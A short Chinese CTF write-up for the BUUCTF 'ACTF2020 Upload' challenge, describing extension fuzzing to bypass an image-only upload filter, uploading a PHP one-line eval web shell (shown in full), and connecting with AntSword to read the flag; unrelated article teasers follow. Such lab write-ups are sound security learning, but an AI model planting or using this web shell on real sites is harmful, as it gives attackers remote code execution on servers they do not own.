打开靶机后发现是一个文件上传的题目
随便上传一个文件观察路径和返回的方式是什么
发现只能上传jpg,png,gif的文件
上传一个jpg文件
发现页面会回显返回的路径
既然有路径了我们就可以尝试上传一句话木马了
构造一句话木马
<?php
@eval($_POST['rc']);
?>
导入字典观察过滤的哪些后缀
发现基本都没过滤
那就找到返回最长的发送过去
上传成功
蚁剑连接
在根目录中便可找到flag
news
2026/4/19 13:38:54
BUUCTF-[ACTF2020 新生赛]Upload
张小明
前端开发工程师
1.2k
24
版权声明:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设
2026/4/19 5:43:21
如何用云服务器搭建PUBG服务器?
云服务器搭建PUBG服务器完整指南一、服务器配置要求硬件配置推荐根据PUBG游戏的性能需求,建议选择以下配置:最低配置:CPU:Intel Core i5-4430 / AMD FX-6300内存:8GB RAM存储:50GB可用空间(推荐…
李华
网站建设
2026/4/17 8:11:44
短剧广告联盟APP开发:数据对接与播放量、广告曝光量、收益联动统计方案
在短剧广告联盟APP的商业化体系中,播放量、广告曝光量与收益数据是衡量运营效果的核心指标,而三者的联动统计与精准对接,更是实现 “内容优化 - 广告策略调整 - 收益提升” 的关键前提。多数短剧APP 在开发阶段易陷入 “数据割裂、统计延迟、…
李华
网站建设
2026/4/16 17:15:38
paperxie 科研绘图:从流程图到专业图表,一键搞定学术可视化的 “高效工具”
paperxie-免费查重复率aigc检测/开题报告/毕业论文/智能排版/文献综述/aippt https://www.paperxie.cn/drawinghttps://www.paperxie.cn/drawing 学术写作中,“图表可视化” 是让研究成果更直观的关键 —— 但多数科研人员常陷入 “不会用专业绘图软件”“图表不符…
李华
网站建设
2026/4/18 9:46:09
通信原理篇---常见的几种部分响应
让我们用「声音接力游戏」来彻底搞懂这几类部分响应。这个比喻会让你瞬间理解它们的区别和妙处。核心比喻:声音接力游戏想象一个游戏:一排人站好,第一个人要悄悄传递一串数字(比如 1 0 1 1)给最后一个人。规则限制&…
李华
网站建设
2026/4/18 5:20:27
通信原理篇---第二类部分响应的预编码和相关编码
我们用「带负号的声音接力」这个游戏来彻底搞懂第四类部分响应的预编码和相关编码。这个类比会让你发现它和第一类的精妙差异。核心比喻:带负号的猜数游戏这次的游戏规则变了,更奇特:新规则:我报出的数字 我当前的数字 - 你猜的上…
李华
网站建设
2026/4/17 11:35:15
MySQL事务隔离级别:从并发混乱到数据一致性守护者
引言:一个银行系统的并发困境想象一下,你正在开发一个银行转账系统。当用户A向用户B转账时,系统需要执行两个操作:从A账户扣款,向B账户加款。在并发环境下,如果没有适当的控制,可能会发生这样的…
李华